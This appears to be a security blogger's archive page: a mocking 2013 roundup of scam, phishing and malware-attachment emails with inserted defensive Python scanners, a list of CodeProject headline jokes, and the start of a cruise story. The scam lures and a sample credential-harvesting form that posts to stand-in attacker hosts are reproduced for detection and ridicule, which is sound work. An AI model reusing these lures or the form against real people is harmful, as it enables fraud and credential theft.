Thanks for all the phishing in 2013


I am thankful that I’m incapable
Of doing any good on my own
I’m so thankful that I’m incapable
Of doing any good on my own
From Thankful by Caedmon’s Call

In 2009, the first year of this blog, in honor of Thanksgiving here in the USA I posted an entry about some things I would have been thankful for in 2009. If they were even remotely true. I’m a collector and, dare I say connoisseur, of Nigerian 419 style phishing messages. Since then it’s become an annual event. So without further ado, here is a sampling of my favorites from 2013. The things I’m thankful for.

I’m thankful for old business associates from past, failed scams who saved my cut for me, despite the fact that I have no recollection of those events.

From: Barrister Benson <>
Sent: Wednesday, November 27, 2013 10:52 AM
To: Recipients

How are you with your family? I hope fine. I’ m happy to inform you about my success in getting those funds from BOA (Bank of Africa) transferred under the cooperation of a new partner from Venezuela, Presently i’m in Venezuela for investment project, meanwhile I didn’t forget your past efforts to assist me in transferring those funds despite that it failed us some how. Now contact my secretary in Benin Republic West Africa through his e -mail id ( ) ask him to send you the A.T.M  VISA CARD worths sum of ($850,000.00 US Dollars) which I kept for your compensation for all the past efforts and attempts to assist me in this transaction. so feel free and get in touch with my secretary Mr.Mike Horton  he will send the A.T.M to you.
Barrister Benson

I’m thankful for people who die with enormous amounts of money floating around in dormant accounts with no heirs.

From: Creg Badmus <>
Sent: Friday, August 2, 2013 1:39 PM
Subject: Hello Dear.

Private Banking Division
HSBC Banking Corporation.

Greetings with due respect ,

Before I introduce myself, I wish to inform that   this letter is no hoax so I urge you treat with respect and endeavour to observe utmost discretion in all matters concerning it.My name is Mr.Creg Badmus ,accountant with Private Banking Division of (World’s Local Bank) HSBC in this regional branch . I  have secured and protected transaction record of $9.8 Million US dollar discovered floating in a dormant account,without documented evidence of next of kin.The HSBC will release and transfer to account you will provide within seven working days under active partnership with my insider role.

This  is possible only if you trust and  willingly capable to work in confidence .More details shall be given to you as soon as you indicate committed interest with full data. This Proposal however is not mandatory nor in any manner compel you against your wish,I suggest you call on my private phone number but if you  feel uncomfortable ,please ignore.I need your strong assurance that you will never let me down,I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law.

Yours Sincerely,
Mr Creg Badmus.
+60 1126394325.

I’m thankful for opportunities to take part in war profiteering for fun and profit.

Sent: Monday, September 2, 2013 7:23 PM
Subject: Look Good Here

Do you wish to become rich due to armed conflicts? It`s right time to do it. Just as the first bombs descend to Syria,
petrol prices will move up just as MONARCHY RESOURCES INC. (M O_N K) stock price! Go make $$$ on September, 3rd,
get M O_N K shares!!!

I’m thankful for the opportunity to literally remake myself into someone new.

From: Travelling Documents <>
Sent: Tuesday, March 5, 2013 2:21 PM
Subject: Passports, Driver’s Licenses, ID Cards, SSN Cards, Birth Certificates

Selling Passports, Driver’s Licenses, ID Cards and Birth Certificates
Erasing Criminal Records (Finger print and Eyes Scan)
Get your self a new identity with the highest security and discretion.
Highest Quality, Extrem Security and International Delivering
If you are interested contact us to

Best Regards
Travelling Documents

What a fortuitous combination of offers! First my old buddy Barrister Benson was kind enough to save my $850,000.00 US Dollars cut from BOA (Bank of Africa) by way of a Venezuela deal that went south. Then an accountant in a branch office of the Private Banking Division of (World’s Local Bank) HSBC, who no doubt got my name from Barrister Benson, who was feeling bad about that BOA deal, wants to cut me in on $9.8 Million US dollar – which he guarantees will be executed under legitimate arrangement that will protect me from any breach of the law, although the “Hello Dear” subject is a little creepy (Creg, dude, I don’t swing that way). And then the semi-anonymous offer to invest in MONARCHY RESOURCES INC. (M O_N K) for a bit of petrol war profiteering, and finally the good folks at Travelling Documents provide me with a way to dash away with all that loot. Hey – they must be legit with that address, right? I mean, what could possibly go wrong?

I’m thankful for companies who alert me to arrest records, financial aid notifications and credit score updates

From: |Attention| <>
Sent: Monday, June 24, 2013 2:28 PM
Subject: Arrest-Records for [your email here] {Mon, 24 Jun 2013 15:28:10 -0500}

Arrest- Records for [your email here] {Mon, 24 Jun 2013 15:28:10  -0500}

Click-to – View

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: 2nd-Attempt <>
Sent: Monday, June 24, 2013 2:17 PM
Subject: Financial-Aid Notification for [your email here] [Mon, 24 Jun 2013 15:17:26 -0500]

Financial – Aid Notification for [your email here] [Mon, 24 Jun 2013 15:17:26  0500]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: [Second-Request] <>
Sent: Monday, June 24, 2013 2:23 PM
Subject: Score-Updates for [your email here] [Exp/TransU/Eqfx] Mon, 24 Jun 2013 15:22:47 -0500

Score- Update for [your email here] [Exp/TransU/Eqfx] Mon, 24 Jun 2013 15:22:47 -0500

View Your Documentation

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

How about that? A one-stop phishing shop for all your fake alert needs! But wait – it gets even better:

I’m thankful for (the same) company who sends me gift cards from Wal-Mart  and Wendy’s.

From: WAL-40993-01 <>
Sent: Monday, June 24, 2013 1:42 PM
Subject: Someone just sent you a Wal-Mart Card [1000USD]

Someone just sent you a Wal – Mart Card [1000USD]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: WEND-773662801-1
Sent: Monday, June 24, 2013 2:19 PM
Subject: Your $50 Wendy’s Card [Mon, 24 Jun 2013 15:18:51 -0500]

Your $50 Wendy’s Card [Mon, 24 Jun 2013 15:18:51 - 0500]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

How sweet is that? The same Phoenix, Arizona USA address for all those different companies and email addresses! In case you were wondering, the alert links all go to and the gift card links all go to Maybe it’s outsourced phishing.

I’m thankful for politicians who request permission to keep me personally informed – even though I’m way outside their district.

From: Congresswoman Cheri Bustos
Sent: Thursday, November 14, 2013 2:14 PM
Subject: Requests Your Permission

Congresswoman Cheri Bustos would like to email you periodically regarding legislative issues in
Congress that are vital to you, your family, and the 17th District of Illinois.

Receiving this information by email is a fast and efficient way to learn more during these
significant times and will provide you with timely information and important news.

Email is part of an ongoing effort to keep constituents informed and engaged. If  you would prefer
not to receive these email messages, please click here .

Best Wishes,
Congresswoman Cheri Bustos
1009 Longworth HOB
Washington, DC 20515
(202) 225- 5905

Who knew that the federal government was reduced to issuing congresswomen email addresses. Ah, such sad fiscal times are these.

I’m thankful for banks that alert me to automatic transfers with handy attachments containing nasty surprises.

From: Ricardo Duffy <>
Sent: Monday, February 25, 2013 5:52 AM
To: [Whole bunch of email addresses in the clear]
Cc: [Whole bunch of email addresses in the clear]
Subject: Automatic transfer notification
WIRE transaction is completed. $3302 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.

*** This is an automatically generated email, please do not reply ***

Attachment: payment -> Contains: payment receipt.exe -> Contains: Backdoor.Agent.RS malware

From: Payment notification system <>
Sent: Thursday, February 21, 2013 11:44 AM
To: [Whole bunch of email addresses in the clear]
Cc: [Whole bunch of email addresses in the clear]
Subject: Automatic transfer notification
Importance: High
WIRE transaction is completed. $962 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.

*** This is an automatically generated email, please do not reply ***

Attachment: payment receipt – -> Contains: payment receipt – 884993762994.exe -> Contains: Backdoor.Androm malware
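Both "automatic transfer" lures above carry an archive whose only content is a Windows executable named like a receipt. The following is an added example (my own code, not from the original post) of the kind of attachment check a mail gateway or triage script can apply before a user ever sees the file: look inside archives, flag executable extensions and double extensions, and check the file's leading bytes rather than trusting its name. The sample archive, the "payment receipt.exe" member and the extension policy list are all constructed for the example.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Hypothetical policy list for this example: extensions that should never arrive as a "receipt".
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
MZ_MAGIC = b"MZ"  # first two bytes of a Windows DOS/PE executable


def inspect_member(name: str, data: bytes) -> list[str]:
    """Return the reasons a single file is suspicious (empty list means nothing was found)."""
    reasons = []
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if suffixes and suffixes[-1] in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable extension {suffixes[-1]}")
    if len(suffixes) > 1:
        # e.g. "receipt.pdf.exe": Explorer hides the real extension by default
        reasons.append("double extension " + "".join(suffixes))
    if data[:2] == MZ_MAGIC:
        reasons.append("content starts with MZ (Windows executable) regardless of name")
    return reasons


def inspect_attachment(filename: str, payload: bytes) -> dict[str, list[str]]:
    """Inspect one attachment; if it is a zip, inspect every member. Returns {name: reasons}."""
    findings: dict[str, list[str]] = {}
    if zipfile.is_zipfile(io.BytesIO(payload)):
        with zipfile.ZipFile(io.BytesIO(payload)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                # Read only a few bytes: enough for the magic check, and no
                # chance of inflating a zip bomb into memory.
                with zf.open(info) as fh:
                    head = fh.read(4)
                reasons = inspect_member(info.filename, head)
                if reasons:
                    findings[f"{filename}/{info.filename}"] = reasons
    else:
        reasons = inspect_member(filename, payload)
        if reasons:
            findings[filename] = reasons
    return findings


def build_sample_zip(inner_name: str) -> bytes:
    """Constructed sample: a zip holding a fake PE (just an MZ header), mimicking the lure above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip("payment receipt.exe")
    for name, reasons in inspect_attachment("payment.zip", sample).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The MZ check is the one that matters: a renamed executable still starts with those two bytes, while the extension checks only catch the lazy cases. Reading four bytes per member keeps the scan cheap and avoids decompressing a hostile archive in full.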

I’m thankful for banks that notify me with credit card statements and unauthorized access notices with handy forms containing surprise destinations.

From: Citi Cards <>
Sent: Friday, December 14, 2012 4:17 AM
Subject: Your Citi Credit Card Statement

Add to your address book to ensure delivery.

Your Account: Important Notification
Your Citi Credit Card statement is ready to view online

Dear customer,

Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from
your statement:

Statement Date:  December 13, 2012
Statement Balance:  -$9,676.80
Minimum Payment Due:  $355.00
Payment Due Date:  Tue, January 01, 2013

Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.

This form contains mostly fraudulent links, including many of the graphics which are primarily from;
The money links (i.e. where your money will go if you click them) are these:

From: <>
Sent: Friday, November 8, 2013 3:09 PM
Subject: Unauthorized Access Notice
Attachments: Citibank.html
Trouble reading this? Add alerts@al to your Address Book

We recently have determined that different computers have tried to log on to your Online Banking account and multiple
password failures were present before logons.

We now need to re-confirm your account information   with us.

Please download and open the document attached to this e-mail in order to verify your records. Please follow the
instructions from the document.

If this is not completed by November 10, 2013 we will be forced to suspend your account indefinitely, as it may have
been used for fraudulent purposes.

PLEASE NOTE: This is a mandatory measure. Failure to verify your records will lead to permanent service suspension.
After verifying your records you will be able to use your account as usual.

We thank you for your cooperation.
This Alert was sent according to your account settings; please do not reply to this message. Please do not contact us
directly as this issue is mainly processed by the Online System.

Attachment: payment receipt – 884993762994
This attachment is a web form that is almost completely sourced from – except for this little gem:
<input name="submit_to" value="," type="HIDDEN">
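The attached form works because the eye checks where the logos come from while the browser posts credentials wherever the hidden field says. As an added example (my own code, not from the original post), the script below parses an HTML attachment, separates the hosts the page merely loads images from against the hosts it submits to (the form action plus any URL buried in a hidden input value), and reports anything that is not the expected brand domain. The sample page and the hostnames brand.example and attacker.invalid are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# URLs packed into one attribute value are split on commas, like the submit_to field above.
URL_RE = re.compile(r"""https?://[^\s,"'<>]+""")


class FormInspector(HTMLParser):
    """Collects where a page loads resources from and, more importantly, where it submits to."""

    def __init__(self):
        super().__init__()
        self.resource_urls = []  # img/script src, link/a href
        self.submit_urls = []    # form action + URLs hidden inside input values

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lower-cases tag and attribute names for us
        if tag in ("img", "script", "link", "a"):
            for key in ("src", "href"):
                if a.get(key):
                    self.resource_urls.append(a[key])
        elif tag == "form" and a.get("action"):
            self.submit_urls.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.submit_urls.extend(URL_RE.findall(a.get("value") or ""))


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def analyze_form(html: str, expected_hosts) -> dict:
    """Return off-brand hosts for resources and for submit targets, plus every submit target seen."""
    parser = FormInspector()
    parser.feed(html)
    expected = {h.lower() for h in expected_hosts}

    def off_brand(urls):
        hosts = set()
        for u in urls:
            h = host_of(u)
            if h and not any(h == e or h.endswith("." + e) for e in expected):
                hosts.add(h)
        return sorted(hosts)

    return {
        "resource_hosts_off_brand": off_brand(parser.resource_urls),
        "submit_hosts_off_brand": off_brand(parser.submit_urls),
        "submit_targets": list(parser.submit_urls),
    }


# Constructed sample mimicking the attachment: brand-hosted graphics, attacker-hosted submit targets.
SAMPLE_HTML = """
<html><body>
<img src="https://www.brand.example/images/logo.gif">
<form method="post" action="https://login-verify.attacker.invalid/cgi/collect.php">
  <input name="submit_to" type="HIDDEN"
         value="https://collector-one.attacker.invalid/a.php,https://collector-two.attacker.invalid/b.php">
  <input name="username"> <input name="password" type="password">
  <input type="submit" value="Verify">
</form>
</body></html>
"""

if __name__ == "__main__":
    report = analyze_form(SAMPLE_HTML, ["brand.example"])
    print("resource hosts off brand:", report["resource_hosts_off_brand"])
    print("submit hosts off brand:  ", report["submit_hosts_off_brand"])
```

The useful signal is the second list: a page whose graphics are all on-brand but whose submit targets are not is exactly the pattern the author describes, and it is a cheap rule to run over HTML attachments at the gateway.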

I’m thankful for lovelorn ostensibly Russian beauties like Nastya, Olga 1 and Olga 2 who are dying to meet me.

From: Anastasia <>
Sent: Monday, May 20, 2013 6:53 AM
Subject: How are you??
How is it going?? I’m Nastya. i look for a second half! I love travelling and pottery. Send me mail. Yours, Nastya!

From: Olga <>
Sent: Monday, February 11, 2013 11:39 AM
Subject: I wait for the answer
You have drawn my attention to a site of acquaintances. I hope, as I shall like you. How I to you in a photo? The truth -
pretty? :) But in a life I more nice!!!
And as I cheerful , kind, sociable and fluffy! I like to go in for sports, read books, to listen to music. I love winter and
summer. I do not love spring and slush.
If I have interested you, with pleasure I shall tell about myself more in the following letter.
I wait for the answer on

From: Olga Ivanova <>
Sent: Monday, February 4, 2013 12:00 PM
Subject: your profile to produce on me greater impression
hello webjoseph!

how are you today? What is your name?
my name is Olga, You frequently are on this site ?
I today wanted to talk to you in a chat
You have yahoo or hotmail ID? if you write to me, ok?
I shall wait from you the letter with impatience


Wow! What a hard (sic) choice to make. I mean, with a name like Nastya how can I go wrong? And she’s looking for a second half – just like the Broncos! But Olga 1 is charming in a sort of can’t-figure-out-Google-Translate kind of way as well as cheerful, kind, sociable and fluffy. Maybe she’s a cat. But apparently Olga 2 is familiar with my devastating charm and rapier wit from my profile on Oddly I can’t actually remember ever going to that site, much less setting up a profile. Oh well that’s one of the downsides to living fast and not dying young.

I’m thankful for kind people who win big lottery prizes like Allen and Violet and Dave and Angela who want to spend those millions making me rich.

From: Allen & Violet Large <>
Sent: Thursday, March 21, 2013 1:09 PM
Subject: Generous Act
Dear Sir/Madam

This is my seventh time of writing you this email. My wife and I won a Jackpot Lottery of $11.2 million in July and have
voluntarily decided to donate the sum of $1,000,000.00 USD to you as part of our own charity project to improve the lot
of 5 lucky individuals all over the world.

If you have received this email then you are one of the lucky recipients and all you have to do is get back with us so that
we can send your details to the payout bank.

You can verify this by visiting the web pages below. -canada -11699678

Good Luck,
Allen & Violet Large

From: Dave and Angela Dawes <>
Sent: Tuesday, August 20, 2013 10:53 AM
Subject: Happy Celebration In Advance
Dear Lucky Recipient,
You are receiving this message because my wife and I have listed you as one of our lucky selected millionaires of 1.5
million Pounds. If you are wondering how you were selected, we Utilize the service of website and search Engine That
Gives away cash prizes to help in the selection.
To Verify the genuineness of this email, watch our interview by visiting this web page so That You can be 100% sure That
You Have Not received an email hoax kindly click here -jackpot -winners-Dave-and -Angela -Dawes -to -give -millions-to -friends -and -family.html
Kindly Provide us with the below requested information, so that we can issue your draft.
Zip Code:
Happy Celebrations in Advance,
Dave-and -Angela -Dawes.

I’m thankful for all of the swell job offers like Consumer Service Critic, Mail & Package Assistant, Shipping/Receiving Clerk and Tour Manager all from the comfort of my home.

From: Joseph webster
Sent: Monday, April 22, 2013 2:40 AM
To: Webmaster
Subject: Consumer Service Critic
MCA -LOGISTICS INC.™ is currently drafting a LIMITED sum of VALUE CRITICS .

MCA -LOGISTICS INC® is a public survey company that uses analyticalShopping to measure the manner of service
It’s an advent to amass definitive perception about products and services.

We work with some of the largest, popular businesses in the America; from Banks to Fast Food to Petroleum,
Technology, Fashion retailers, and others more.

You will be employed to conduct an all charges paid survey and opinion task on behalf of MCA -LOGISTICS INC.
As our EVALUATIOR/ANALYTICAL clientele, you will be askedto POSE as a normal consumer while going to different places of work.
You’ll be required to discharge exact under- taking such as obtaining a merchandise or utilizing a service.
Your task will be to assess and measure the virtue of retail services rendered.
You’ll covertly evaluate their customer service while appearing as a normal customer When you’re done, you will be expected to fax your EVALUATION RECORDS (which we will provide to you) to us and then you will get paid for your opinions .
That is all there’s to it !

Peculiar expertise are not required for this task.
If you became interested in the vacancy, please reply to with the following informations:

Your name,complete mailing address,telephone and email address.

We will send you the details and the employment contract.

*****MINIMUM AGE DEMAND IS 30 YEARS************ Matured ANALYZERS ONLY, due to sedulity.

MCA -LOGISTICS INC. ©1992-2013

From: Joseph webster
Sent: Thursday, May 2, 2013 12:41 AM
To: Postmaster
Subject: Easy, fast, profitable
My name is Michael Watson, I’m Hiring Manager with Royal Mail 4 Delivery, Inc. I lately reviewed your CV with great
interest and I think that you may possess the experience needed prescribed for an occupation with our company.
You may see into this work as a part – time one or as an another earning and profit. I can mail you in more detail
description of Mail & Package Assistant per your letter of inquiry through email.
Please, do not hesitate to ask me any questions.
Thank you for the provided opportunity.

Yours faithfully,
Michael Watson
Royal Mail 4 Delivery Inc.

From: Joseph webster
Sent: Sunday, January 20, 2013 10:39 AM
To: AOL Users; Webmaster
Subject: EU deliveries is hiring
EU Deliveries is employing for the position of Shipping/Receiving Clerk.
We have many years of experience transportation individual parcels, papers and heavy cargo and have become pleased associates with USPS, UPS and FedEx.
As a Shipping/Receiving Clerk, you will be working from home. We suppose
our Shipping/Receiving Clerk to conduct the next activities:
– Suggesting our purchasers with the best level of buyer assistance service possible;
– Supervising and monitoring customer’s package sending operations;
– Keeping records of the processed package and mail
Your typical daily tasks will contain:
– operating with a remote helpdesk (it helps to schedule your daily work, send message to otherteam members, download and share project documentation and other materials);
– answer client emails and calls.
Salary and remuneration:
– usd 40000 yearly (paid in parts, every month).
– Working hours: 9AM – 5PM Mon – Fri
In order to apply for this position, please email us a copy of your most recent CV. We will check the submitted information and call back you in 1 -2 business days to tell you about the status of your application.
Bruce Grossman, EU Deliveries Human Resources dpt.

From: Joseph webster
Sent: Monday, March 4, 2013 6:51 AM
To: Postmaster
Cc: Administrator
Subject: Work for those who wishes to earn money

Our company, Grand Tour tourist agency offers you a part-time position of a Tour Manager. We are one of the largest 10 travel agencies in Europe, we also work with the United States.

At this moment, our firm is searching for interested individuals who will be able to become our reps in the USA. So this ad is only for people with the USA citizenship or a work permit. Your main role will be providing support for our clients from the United States, while they are voyaging in Europe.


– Basic skills with PC, including e-mails and word processing;
– Must be able to multi-task;
– Must be at least 19;
– High School Diploma or a college degree is a benefit.

Your pay will be usd 4000 monthly according to the work plan that should be executed. For further details, please write us at: . Upon receiving your message, we will forward you all the required
information to get acquainted with.

Yours sincerely,
Laura Pennington
Grand Tour

Wowzers! I had no idea you could be a Tour Manager or a Shipping/Receiving Clerk with no experience. From home. In your skivvies (OK TMI). But the really interesting thing about these offer letters is that they all appear to have been generated from the same faulty template. Note that the emails are always From: Joseph webster with different spoofed email addresses. Oh well, they just got several of the properties mixed up. Or maybe not, after all Michael Watson thanked me for the provided opportunity. You’re welcome, Mike. It was nothing. No really.

So there you have it – my list of stuff that I would be thankful for if they were even marginally real.

How to write headline commentary in 2013

Way back in 2009 I posted an entry about the great headline commentary in the [CodeProject] daily news. Once again those CodeProject editors have done their snarky best. And no, they have definitely not mellowed with age. The following are some of my favorites from 2013 curated and categorized for your further edification.

Because the Bible tells me so

Why the Bar Code Will Always Be the Mark of the Beast
And when he had opened the fourth seal, I heard the voice say, “Attention shoppers….”

Google patent: Throat tattoo with lie-detecting mobile microphone built-in
“And that no man might buy or sell, save he that had the mark, or the name of the beast, or the number of his name.”

How the Bible and YouTube are fueling the next frontier of password cracking
And The Lord set his password to p@ssw0rd, and there was much gnashing of teeth and rending of cloth

Python. Monty Python.

If You Can’t Do Email Validation Right…
No one expects the Spanish@Inquisit.ion.

The hollow triangular numbers are divisible by three
Then, shalt thou count to three. No more. No less. Three shalt be the number thou shalt count.

Obligatory Star Wars references

Samsung Demos a Tablet Controlled by Your Brain
I felt a great disturbance in the Force, as if several emails had just arrived.

(Open)VMS – the end of an era
Join me, Windows NT, and together we can rule the galaxy as father and son.

Obligatory Star Trek references

The Bounded Gaps Between Primes Theorem has been proved
Proving the prime directive: Kirk + Green alien women do not appear in sequential Star Trek episodes.

Surfing the memes

Protect Yourself From SQL Injection
Those who cannot remember the past are condemned to DELETE FROM Employees

SimCity mod demonstrates the possibility of some form of indefinite offline play
Sharks with frikin lasers attached to their heads add-on can’t be far behind.

You don’t need every customer
1 star. Unfunny subhead. Needs more cowbell.

They’re killing the PC
Then that means all those computers in the office… They must be the undead!

Binary Integer Programming With Python
Step 2: make sure optimization errors do not accidentally cause zombie apocalypse.

What the meaning of is is
I did not have NULL relations with that variable.

Google’s Quantum A.I. Lab adds quantum physics to Minecraft
Use it to build a cat

Great news! Engineers aren’t psychopaths (but CEOs are)
“I’m not a psychopath, I’m a high-functioning sociopath. Do your research.”

Enough LOLCATS already

The One Tip That Will Help You Learn To Code 10x Faster
Curiosity killed the cat. So did looking at animated GIFs of cats. Only more slowly.

More data storage? Here’s how to fit 1,000 terabytes on a DVD
Removing cat photos and animated GIFs reduces the problem significantly.

The year of the Linux … something

9 Things That Are Never Admitted About Open Source
One thing we can agree on: “next year” is always the year of the Linux desktop.

Ubuntu for Phones – Analysis for Potential and Visual Breakdown
Oh, great. 2013 will be the year of the Linux desktop *and* phone.

How to: Steam on Linux (Debian 7.0)
The year of the Linux GAMING desktop!

Why Is The International Space Station Switching From Windows To GNU/Linux?
This is finally the year of the Linux space station.

Data in the driver’s seat
This could be the year of Linux on the dashboard.

Dear Linux, I’m leaving you — for Windows 8
I guess last year was the year of the Linux desktop… and we missed it.

Life in tech world

Brace styles and JavaScript
Pro tip: when someone pays you to write code for them, use whatever style they prefer.

First Impressions: the TECK Ergonomic Mechanical Keyboard
Ergonomics is Latin for “You won’t get any work done for weeks.”

Kids, don’t believe the startup hype: Why you should join a big company first
You’ve got to ask yourself one question: Do I like ramen?

Universities fail to offer essential programming skills like Cobol
There’s also worryingly low enrollment in Conversational Latin.

On false dichotomies and diversity (in tech conferences)
In an industry where 27–29% are female, if you manage to get a speaker line-up with 0% female speakers, you have a bias.

How to work with software engineers
Free donuts works for me. What’s your trick?

The Tech Industry’s Darkest Secret: It’s All About Age
Youth and enthusiasm is cheaper than age and experience. In the short run.

Study: Most CEOs lack vision, leadership on new computer tech
In related news: IT workers shocked (that a study got something right)

The Machine-Readable Workforce
Thank you for applying. According to our algorithms, you’re fired.

6 predictions for the future of tech from Google exec Eric Schmidt
Bonus prediction: an important update will begin just when you need to do something else.

Microsoft’s revamped Kinect for Xbox One will also come to Windows next year
The new Ctrl+Alt+Delete: Wave, Swipe, Raise the roof, Jump to the left, Stick it, Glide

Live in a dev world

Announcing Topaz: A New Ruby
A Ruby clone, written in Python, based on a Ruby port… um, OK.

jQuery made me become a programmer
Think of jQuery as a gateway “language”… pretty soon they’ll be coding the hard stuff.

The Definitive Reference To Why Maybe Is Better Than Null
Schrodinger’s Type: Maybe it’s there. Maybe it’s not.

Like a good scotch, developers get better with age
Even better? A developer drinking scotch

Almost Flat Design
Next up: abstract expressionist interfaces. Click wherever you like. It won’t mean anything.

Frame of Reference — The real issues at the heart of modern interface design
The skeuomorphic of today is the hieroglyphic of tomorrow.

What makes Java developers more productive?
Two quarts of French Roast, and a #18 needle

9 Fallacies of Java Performance
“Sophisticated platform” typically means “I have no idea how it works.”

What’s in a name?

What comes next after Windows 8.1?
Windows 2014 RT CE RTFM IX, Ultraviolet Edition

Nokia shareholders approve Microsoft deal
One step closer to “Windows Phone 9 360, Powered by Nokia Lumia Technology”

Close enough for government work

Fork the government (before they fork you)

Security hole in exposed user email addresses
/face palm Someone get little Bobby Drop Table to log in

website ‘didn’t have a chance in hell’
Too big to succeed (500 million lines of code?!)

Nations Buying as Hackers Sell Flaws in Computer Code
First we get Moose and Squirrel, then conquer World.

Exciting stuff someone might want

Does Anyone Actually Want a “Facebook Phone”?
I’m holding out for a Twitter pager.

Facebook’s “Phone” Is Another Triumph of Mediocrity
The genius of the Facebook phone is that the company made a phone without making a phone at all.

Microsoft may give smartwatches another try
Even a stopped clock is right twice a day… except when it’s digital.

Almost every major consumer electronics manufacturer is now working on a smart watch
In other news, hardly anyone actually wants a smart watch.

New wave Wi-Fi: Wireless underwater Internet in the works
Good news for all twittering SCUBA divers

Mozilla Appmaker
Apps made by apps that allow anyone to build apps should be used by no one

IBM has a new protocol (and a box) for the internet of things
An Arduino can do this, but no one was ever fired for buying IBM.

Security is in the eye of the beholder

Should websites be required to publicly disclose their password storage strategy?
“Robust” means storing them in plain text behind a website riddled with XSS and SQL injection.

Obscurity: A Better Way to Think About Your Data Than ‘Privacy’
It’s difficult to protect your privacy from your own oversharing

How Secure Are Windows Store Apps?
I’m skeptical of the inherent security of a security model that requires constant updates.

Microsoft account to get two-factor authentication soon
Your password must contain a capital letter, a number, a haiku, a toad’s foot…

Eric Schmidt calls Android ‘more secure than the iPhone’
And by ‘secure’, he means, ‘makes me more money”

Just between you and me. And the NSA.

Confirmed: The NSA is Spying on Millions of Americans
Dear NSA, please tell me which phone/data plan best suits my usage patterns

Microsoft Finally Offers To Pay Hackers For Security Bugs With $100,000 Bounty
As a bonus, you’ll also be included in an exclusive list of hackers watched by the NSA.

Google’s Schmidt: NSA spying on data centers Is ‘outrageous’
Yeah, everyone knows they should only be spying on cell phones (and browsers, and …)

Apple releases report on government requests for user data, ‘strongly’ opposes US gag order
“If you are on a list targeted by the CIA, you really have nothing to worry about. If however, you have a name similar to somebody on a list targeted by the CIA, then you are dead.”

Tweaking the corporate giants

How to check if your Adobe account was compromised
Or use this handy guide, “Have you ever signed into the Adobe site?”

Core Rot at Apple
No mystical reality distortion field controls my destiny. It’s all a lot of simple tricks and nonsense

Defective Dell Latitude 6430u notebooks ‘smell of cat urine’
It’s the new corporate scent, now that they’ve gone private

In Nook, Microsoft sees a chance to compete against Amazon and Apple
A nook can’t read so a nook can’t cook, SO… a Surface with Nook might be a good hook.

Plan your digital afterlife with Inactive Account Manager
Welcome to the Past Lives Pavilion…. brought to you by “Google Death.”

A close look at how Oracle installs deceptive software with Java updates
We’ve secretly replaced the fine Java they usually serve with insecure browser toolbars. Let’s see if anyone notices…

Oracle database costs are driving firms to Postgres, says EnterpriseDB
And in related news, the CEO of Oracle was seen sailing his 88m yacht to his island (Lanai, most of it anyway)

My Christmas Vacation from Hell, a Cautionary Tale.

To paraphrase Joe Friday of Dragnet fame, here are just the facts, ma’am: Since 2012 marked our 30th anniversary, my wife and I booked a Christmas Cruise. This being our first cruise, we were lucky to be accompanied by some family members, several of which are veteran cruisers. The salient fact about this cruise is that it embarked from Baltimore, MD USA and included a stop in Port Canaveral, FL USA before sailing on to the Bahamas. As Charles Dickens writes in A Christmas Carol, this must be distinctly understood, or nothing wonderful can come of the story I am going to relate.

Shortly after we sailed I started feeling ill. By dinner I was very sick, but everyone including the ship’s doctor assured me that it was just sea-sickness and that a nice lie down in the stateroom would have me ready to eat and drink my way to cruise nirvana soon. By the time the ship docked in Port Canaveral it was apparent that my affliction was not motion sickness but something more serious and probably contagious. So at this point my wife and I decided to leave the cruise since luckily we were still in the USA. Turns out that was not so lucky after all.

The guest services people on the ship, while quite solicitous and sympathetic, were nonetheless flummoxed by this situation. First they told us that we were not allowed to disembark until we reached Nassau, in the Bahamas. When pressed further they decided that while we could technically disembark in Florida, there would be a $300 per person fee to do so. We decided that it would be worth the $600 to avoid sailing on and then risking having to fly home to Colorado from Nassau. So we made the appropriate arrangements with a local hotel and rescheduled our flights accordingly. When we arrived back at the guest services desk, luggage in hand, the attendant informed us that they just needed to contact Customs and Border Protection (CBP) so we could be escorted off the ship. A few moments later, the seriously flustered crew member returned with news that CBP would not be able to send anyone until long after the ship was scheduled to sail for the Bahamas. At this point we got a bit testy and pointed out that we could simply walk off the ship, it being docked and we being American citizens, to which the amazingly understanding, but frustrated, guest services guy replied that while that was a possibility, they would be required to inform local authorities that we had disembarked and we would then in essence be fugitives, albeit very easy to find fugitives.

So feeling defeated, we decided that the best course of action would be to make another visit to the ship’s doctor and stick it out until we reached Nassau and decide then what course of action to take. The doctor concurred with our amateur diagnosis of some kind of virus infection, medicated me heavily and quarantined me to our stateroom for 24 hours which would be about the time we would arrive in Nassau. Fortunately the treatment was effective and I was more or less healthy when we reached Nassau and decided to continue the cruise. Unfortunately between the hotel we booked on short notice and never used and the changes in airline flights we made, the cost was substantial.

So how does a snarky security blogger having a bad vacation affect you and how is this a “cautionary tale”? I’m glad you asked.

The real story involves antiquated laws, security theater and the nature of the passenger maritime industry. But I’m getting ahead of myself.

The story begins in 1886 with a bit of legislation intended to protect the then-in-its-infancy American passenger vessel industry, called the Passenger Vessel Services Act of 1886.

